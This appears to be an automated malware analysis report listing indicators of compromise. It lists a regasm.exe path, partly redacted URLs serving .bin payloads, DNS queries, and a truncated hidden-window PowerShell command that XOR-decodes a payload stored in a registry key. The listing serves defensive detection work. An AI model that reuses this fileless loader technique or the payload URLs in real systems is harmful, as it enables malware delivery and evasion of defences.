Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- http://jo#i.ru/D2PoZRRSkW4wKm.bin
- http://jo##.net/D2PoZRRSkW4wKm.bin
- http://dl#.#oxi.net/drive/2020/02/27/0039/1928/2619272/72/27b4ca39e2.bin
- DNS ASK jo#i.ru
- DNS ASK jo##.net
- DNS ASK dl#.#oxi.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $oAKyEL='';$IySCmU=(Get-ItemProperty HKCU:\/Software\/mBqacIDJkIUI).PScRjRPmIOWHk;for ($i=0;$i -lt $IySCmU.Length;$i++){$IySCmU[$i]=[byte]($IySCmU[$i] -bxor 'tr1'[$i % 'tr1'.Length])};[Threadin...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $oAKyEL='';$IySCmU=(Get-ItemProperty HKCU:\/Software\/mBqacIDJkIUI).PScRjRPmIOWHk;for ($i=0;$i -lt $IySCmU.Length;$i++){$IySCmU[$i]=[byte]($IySCmU[$i] -bxor 'tr1'[$i % 'tr1'.Length])};[Threadin...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'